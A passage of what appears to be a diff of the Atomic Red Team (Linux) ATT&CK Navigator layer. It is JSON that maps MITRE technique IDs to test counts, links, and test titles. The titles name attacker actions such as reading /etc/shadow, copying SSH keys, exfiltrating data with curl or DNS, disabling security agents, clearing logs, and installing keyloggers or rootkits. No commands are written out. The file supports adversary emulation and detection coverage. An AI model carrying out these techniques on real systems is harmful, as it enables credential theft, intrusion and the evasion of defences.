Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":4,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":2,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":35,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable 
journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":10,"enabled":true,"comment":"\n- Disable syslog\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":7,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":11,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":2,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Logging Configuration Changes on Linux Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event 
Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with sh on FreeBSD (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/master.passwd (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell 
builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n- System Service Discovery - service\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":2,"enabled":true,"comment":"\n- System Network Configuration Discovery\n- System Network Configuration Discovery (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":6,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - netstat\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"comment":"\n- Space After Filename\n- Space After Filename (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"comment":"\n- rc.common\n- rc.local\n- rc.local (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":8,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture FreeBSD using tshark or tcpdump\n- Packet Capture FreeBSD using /dev/bpfN with sudo\n- Filtered Packet Capture FreeBSD using /dev/bpfN with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":3,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n- Port Scan Nmap for FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - 
SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":4,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n- Python3 http.server (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"comment":"\n- At - Schedule a job\n- At - Schedule a job freebsd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /etc/cron.d folder\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":6,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Logging sh history to syslog/messages\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":17,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Obfuscated command line scripts (freebsd)\n- Change login shell\n- Change login shell (freebsd)\n- Environment variable scripts\n- Environment variable scripts (freebsd)\n- Detecting pipe-to-shell\n- Detecting pipe-to-shell (freebsd)\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- 
Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":36,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":9,"enabled":true,"comment":"\n- rm -rf\n- rm -rf\n- Truncate system log files via truncate utility (freebsd)\n- Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)\n- Overwrite FreeBSD system log via echo utility\n- Delete system log files via unlink utility (freebsd)\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":16,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear sh history (rm)\n- Clear Bash history (echo)\n- Clear sh history (echo)\n- Clear Bash history (cat dev/null)\n- Clear sh history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear sh history (ln dev/null)\n- Clear 
Bash history (truncate)\n- Clear sh history (truncate)\n- Clear history of a bunch of shells\n- Clear history of a bunch of shells (freebsd)\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n- Disable sh History Logging with SSH -T (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":5,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n- Delete Filesystem - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n- Stage data from Discovery.sh (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":6,"enabled":true,"comment":"\n- Create local account (Linux)\n- Create local account (FreeBSD)\n- Reactivate a locked/expired account (Linux)\n- Reactivate a locked/expired account (FreeBSD)\n- Login as nobody (Linux)\n- Login as nobody (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":8,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- FreeBSD VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n- FreeBSD List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":7,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View 
accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Show if a user account has ever logged in remotely (freebsd)\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n- Tor Proxy Usage - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n- SUDO Brute Force - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":2,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n- SSH Credential Stuffing From FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":4,"enabled":true,"comment":"\n- X Windows Capture\n- X Windows Capture (freebsd)\n- Capture Linux Desktop using Import Tool\n- Capture Linux Desktop using Import Tool (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in FreeBSD/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"comment":"\n- Base64 Encoded data.\n- Base64 Encoded data (freebsd)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":2,"enabled":true,"comment":"\n- Network Share Discovery - linux\n- Network Share Discovery - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a user account on a FreeBSD system\n- Create a new user in Linux with `root` UID and GID.\n- Create a new user in FreeBSD with `root` GID.\n","links":[{"label":"View 